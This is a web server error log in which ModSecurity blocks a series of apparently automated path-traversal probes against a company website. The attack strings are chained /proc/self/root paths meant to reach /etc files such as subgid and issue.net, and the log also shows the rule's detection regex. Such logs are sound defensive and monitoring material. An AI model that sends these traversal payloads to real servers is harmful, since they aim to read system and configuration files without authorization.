[Fri Mar 20 06:08:26.293626 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:47874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OijJ3M9BSuKP7CAYBpgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:08:27.627485 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:47880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Oi_qxLDW4GITHUkTPbwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:08:28.793019 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:47894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OjAF0L0L-SsrnPo5SSQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:08:30.059777 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:53122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OjhCii7xarUs8iHZSZQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:08:37.679550 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:53136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OlfqxLDW4GITHUkTPegAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:08:41.015279 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:53150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Omda6ubjKNq_cu4a8-QAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:08:57.452912 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:60954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OqQF0L0L-SsrnPo5SZAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:00.817446 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:59252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OrOoXxyEfFpUF8f9sPwAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:06.503077 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:51366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Osrninkcc-iUj5ApI4wAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:09:14.299484 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.243.128:51382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OuvHIg5MgXLBnicPkWgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:17.711312 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:58592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OvfXLqtnMIWvjpaKEsAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:20.038646 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:58608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OwPXLqtnMIWvjpaKEtAAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:09:35.744986 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:52796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OzzJ3M9BSuKP7CAYCEAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:09:38.068435 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:41848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0O0uoXxyEfFpUF8f9sVgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:39.381309 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:41858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0O09a6ubjKNq_cu4a9HQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:48.941640 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.243.128:37988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0O3PHIg5MgXLBnicPkbwAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:09:51.669912 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:52394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0O3zJ3M9BSuKP7CAYCJwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:09:52.963006 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:52406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0O4PqxLDW4GITHUkTPoQAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:10:36.323088 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:56200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PDF1pVZ5mVmJwsFMa_AAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:10:57.467079 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:52416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PIV1pVZ5mVmJwsFMbGwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:11:04.448597 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:45244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PKAF0L0L-SsrnPo5SqgAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:05.799131 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:57544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PKfXLqtnMIWvjpaKE_AAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
